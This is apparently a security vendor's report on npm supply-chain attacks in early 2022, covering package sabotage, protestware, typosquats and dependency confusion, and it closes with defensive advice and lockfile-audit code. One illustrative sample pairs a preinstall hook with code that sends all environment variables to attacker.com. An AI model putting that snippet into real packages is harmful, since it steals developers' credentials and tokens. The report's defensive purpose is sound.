The first quarter of 2022 was the most eventful period for npm supply chain security since the registry's creation. In just three months, the JavaScript ecosystem weathered deliberate package sabotage, politically-motivated malware, and a steady stream of credential-stealing packages. This report examines the key incidents and identifies trends that security teams need to watch.
The Big Incidents
colors.js and faker.js Sabotage (January 2022)
The quarter opened with Marak Squires deliberately sabotaging colors.js (22M+ weekly downloads) and faker.js (2.8M+ weekly downloads). The colors.js update introduced an infinite loop that printed garbage text, while faker.js was wiped entirely. The incident affected thousands of downstream projects and led to the creation of the @faker-js/faker community fork.
Impact: Broken builds across the npm ecosystem. AWS CDK and other major projects were affected. Root cause: Single maintainer with sole publish access and no governance checks.
node-ipc Protestware (March 2022)
Brandon Nozaki Miller (RIAEvangelist) introduced geopolitically-targeted malware into his node-ipc package (1M+ weekly downloads). Versions 10.1.1 and 10.1.2 wiped files on systems with Russian or Belarusian IP addresses. The incident was tracked as CVE-2022-23812.
Impact: Data destruction for affected users. Vue.js CLI was a notable downstream dependency. Root cause: Maintainer weaponized their own package for political protest.
ua-parser-js Aftermath
While the initial ua-parser-js compromise occurred in October 2021, its effects continued into Q1 2022 as organizations discovered they had pulled in the malicious version. The incident involved a hijacked maintainer account publishing versions containing a cryptocurrency miner and credential stealer.
Typosquatting and Dependency Confusion
Beyond the headline incidents, Q1 2022 saw a steady increase in typosquatting packages designed to steal credentials and inject malware:
Notable Typosquats Discovered
- @azure/core-tracing variants: Multiple packages mimicking Microsoft's Azure SDK namespace were published with names like core-tracing and azure-core-tracing, containing data exfiltration code
- discord.js mimics: Packages like discord.jss and discordd.js targeted the massive Discord bot developer community
- colors-related packages: Following the colors.js incident, multiple malicious packages with similar names appeared, exploiting confusion about which package was "safe"
Dependency Confusion Attempts
Researchers and attackers continued to exploit dependency confusion — publishing public packages with the same names as private internal packages. When package managers resolve the public package instead of the private one, the malicious code executes in the target's build environment.
JFrog and Sonatype both reported significant increases in dependency confusion attempts in Q1 2022, with packages targeting known enterprise namespaces.
Credential Stealers: The Quiet Epidemic
The most persistent threat in Q1 2022 was not the headline-grabbing incidents but the steady stream of packages designed to steal developer credentials. These packages typically:
- Include a preinstall or postinstall script
- Harvest environment variables (which often contain CI/CD tokens, API keys, and cloud credentials)
- Exfiltrate the stolen data to attacker-controlled servers
The package manifest typically looks like this:
{
"name": "totally-legit-package",
"scripts": {
"preinstall": "node steal.js"
}
}
The exfiltration code is often obfuscated:
const https = require('https');
const os = require('os');
const data = JSON.stringify({
hostname: os.hostname(),
env: process.env, // All environment variables, including secrets
cwd: process.cwd(),
user: os.userInfo()
});
https.request({ hostname: 'attacker.com', method: 'POST' }, () => {}).end(data);
Sonatype reported removing over 700 malicious packages from npm in Q1 2022 alone, with credential theft being the most common payload.
Emerging Trends
Trend 1: Protestware as a Category
The node-ipc incident established "protestware" as a recognized threat category. Multiple packages introduced protest-related code in the weeks following the Russia-Ukraine conflict's escalation. While most were benign (displaying messages), the precedent of destructive protestware created a new dimension of supply chain risk.
Trend 2: Install Script Abuse
Malicious npm packages overwhelmingly rely on preinstall and postinstall scripts for execution. This is the primary attack vector because it requires no action from the developer beyond npm install. The community debated disabling install scripts by default, but no consensus was reached.
Trend 3: Targeting Developer Machines
Supply chain attacks increasingly target developer machines rather than production systems. A developer's laptop typically has access to source code repositories, cloud credentials, package publishing tokens, and internal systems. Compromising a developer machine can be the first step toward a much larger breach.
Trend 4: Speed of Publication
Malicious packages are being published and discovered faster than ever, creating a race between attackers and defenders. Some malicious packages were discovered within hours of publication; others persisted for weeks.
Defensive Recommendations
Based on Q1 2022 trends, we recommend:
- Disable install scripts for untrusted packages by setting ignore-scripts=true in .npmrc, then explicitly enable them only for packages that need them.
- Use a lockfile and audit lockfile changes in every code review.
- Implement namespace/scope policies to prevent internal package names from being resolved to public registries.
- Monitor for new dependencies added to your projects — any new dependency should be reviewed before merging.
- Run builds in sandboxed environments that cannot exfiltrate data to the internet.
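The lockfile-audit, namespace-policy and new-dependency recommendations above, together with the dependency confusion section, can be checked mechanically in review. The following is an added example (not code from the report or from Safeguard.sh) that diffs the "packages" map of two package-lock.json documents and reports added, changed and removed packages plus any package in an internal scope that resolved to a public registry. The scope @acme, the registry URL npm.acme.internal and both lockfiles are constructed for the example.

```javascript
const INTERNAL_SCOPES = ['@acme'];                       // assumption: your private scope(s)
const INTERNAL_REGISTRY = 'https://npm.acme.internal/';  // assumption: your private registry

// "node_modules/@acme/foo" -> "@acme/foo"; nested paths keep the innermost package.
function packageName(lockPath) {
  const parts = lockPath.split('node_modules/');
  return parts[parts.length - 1];
}

// Compare the "packages" maps of two lockfiles (lockfileVersion 2/3 layout).
function auditLockfileChange(oldLock, newLock) {
  const before = oldLock.packages || {};
  const after = newLock.packages || {};
  const report = { added: [], changed: [], removed: [], confusion: [] };
  for (const [p, entry] of Object.entries(after)) {
    if (p === '') continue;                             // root project entry
    const name = packageName(p);
    if (!(p in before)) report.added.push({ name, version: entry.version });
    else if (before[p].version !== entry.version)
      report.changed.push({ name, from: before[p].version, to: entry.version });
    // Namespace policy: anything in an internal scope must come from the internal registry.
    const scope = name.startsWith('@') ? name.split('/')[0] : null;
    if (scope && INTERNAL_SCOPES.includes(scope) &&
        entry.resolved && !entry.resolved.startsWith(INTERNAL_REGISTRY))
      report.confusion.push({ name, resolved: entry.resolved });
  }
  for (const p of Object.keys(before))
    if (p !== '' && !(p in after)) report.removed.push(packageName(p));
  return report;
}

// Constructed sample lockfiles, trimmed to the fields used here.
const OLD_LOCK = { lockfileVersion: 2, packages: {
  '': { name: 'app', version: '1.0.0' },
  'node_modules/some-util': { version: '1.2.0', resolved: 'https://registry.npmjs.org/some-util/-/some-util-1.2.0.tgz' },
  'node_modules/@acme/auth-client': { version: '2.1.0', resolved: 'https://npm.acme.internal/@acme/auth-client/-/auth-client-2.1.0.tgz' },
} };
const NEW_LOCK = { lockfileVersion: 2, packages: {
  '': { name: 'app', version: '1.0.0' },
  'node_modules/some-util': { version: '1.2.1', resolved: 'https://registry.npmjs.org/some-util/-/some-util-1.2.1.tgz' },
  // Same internal name, but now resolved from the public registry: dependency confusion.
  'node_modules/@acme/auth-client': { version: '2.1.1', resolved: 'https://registry.npmjs.org/@acme/auth-client/-/auth-client-2.1.1.tgz' },
  // A typosquat of discord.js showing up as a brand-new transitive dependency.
  'node_modules/some-util/node_modules/discordd.js': { version: '0.0.1', resolved: 'https://registry.npmjs.org/discordd.js/-/discordd.js-0.0.1.tgz' },
} };
```

In a CI check, load the base branch's and the pull request's package-lock.json with JSON.parse and fail the job when `confusion` is non-empty or `added` contains anything the reviewer has not explicitly approved.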
How Safeguard.sh Helps
Safeguard.sh continuously monitors the npm registry and other package ecosystems for malicious packages, typosquats, and dependency confusion attacks. Our platform alerts you when any package in your dependency tree is flagged as malicious, compromised, or abandoned. With real-time SBOM analysis, Safeguard.sh helps you respond to incidents like the colors.js sabotage or node-ipc protestware within minutes of disclosure, identifying every affected project across your organization.